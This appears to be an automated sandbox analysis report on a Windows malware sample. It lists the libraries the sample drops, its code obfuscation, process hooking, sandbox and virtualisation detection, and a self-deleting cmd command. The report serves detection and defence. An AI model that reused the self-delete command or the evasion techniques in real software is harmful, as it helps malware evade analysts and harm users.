Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: eLZzxG56uH.exe, 00000000.00000002.316625537.000000006EAB9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: eLZzxG56uH.exe, 00000000.00000002.316625537.000000006EAB9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_00800100 push ebp; ret 0_2_00800117
PE file contains sections with non-standard names
Source: eLZzxG56uH.exe Static PE information: section name: Intel Co
Source: eLZzxG56uH.exe Static PE information: section name: Intel Co
Source: eLZzxG56uH.exe Static PE information: section name: Intel Co
Source: sqlite3.dll.0.dr Static PE information: section name: /4
Source: sqlite3.dll.0.dr Static PE information: section name: /19
Source: sqlite3.dll.0.dr Static PE information: section name: /31
Source: sqlite3.dll.0.dr Static PE information: section name: /45
Source: sqlite3.dll.0.dr Static PE information: section name: /57
Source: sqlite3.dll.0.dr Static PE information: section name: /70
Source: sqlite3.dll.0.dr Static PE information: section name: /81
Source: sqlite3.dll.0.dr Static PE information: section name: /92
Source: AccessibleHandler.dll.0.dr Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.0.dr Static PE information: section name: .orpc
Source: IA2Marshal.dll.0.dr Static PE information: section name: .orpc
Source: lgpllibs.dll.0.dr Static PE information: section name: .rodata
Source: MapiProxy.dll.0.dr Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.0.dr Static PE information: section name: .orpc
Source: mozglue.dll.0.dr Static PE information: section name: .didat
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001F49A2 LoadLibraryA,GetProcAddress,FreeLibrary, 0_2_001F49A2
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: Intel Co
Binary contains a suspicious time stamp
Source: ucrtbase.dll.0.dr Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Memory written: PID: 3340 base: 1530005 value: E9 FB BF 0E 76
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Memory written: PID: 3340 base: 7761C000 value: E9 0A 40 F1 89
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Memory written: PID: 3340 base: 1540008 value: E9 AB E0 11 76
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Memory written: PID: 3340 base: 7765E0B0 value: E9 60 1F EE 89
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Memory written: PID: 3340 base: 1670005 value: E9 CB 5A 29 75
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Memory written: PID: 3340 base: 76905AD0 value: E9 3A A5 D6 8A
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Memory written: PID: 3340 base: 3220005 value: E9 5B B0 70 73
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Memory written: PID: 3340 base: 7692B060 value: E9 AA 4F 8F 8C
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Memory written: PID: 3340 base: 3230005 value: E9 DB F8 31 71
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Memory written: PID: 3340 base: 7454F8E0 value: E9 2A 07 CE 8E
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Memory written: PID: 3340 base: 3240005 value: E9 FB 42 33 71
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Memory written: PID: 3340 base: 74574300 value: E9 0A BD CC 8E
Self deletion via cmd delete
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\eLZzxG56uH.exe'
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001E06DD __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_001E06DD

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: eLZzxG56uH.exe, 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Binary or memory string: SBIEDLL.DLL
Source: eLZzxG56uH.exe, 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Binary or memory string: SBIEDLL.DLL6
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\eLZzxG56uH.exe RDTSC instruction interceptor: First address: 000000000067BEBE second address: 000000000067BEC7 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 inc cl 0x00000005 ror cl, 1 0x00000007 mov al, dl 0x00000009 rdtsc
Source: C:\Users\user\Desktop\eLZzxG56uH.exe RDTSC instruction interceptor: First address: 000000000049A2ED second address: 000000000049A2F6 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 inc cl 0x00000005 ror cl, 1 0x00000007 mov al, dl 0x00000009 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\eLZzxG56uH.exe TID: 4840 Thread sleep time: -150000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5348 Thread sleep count: 72 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll
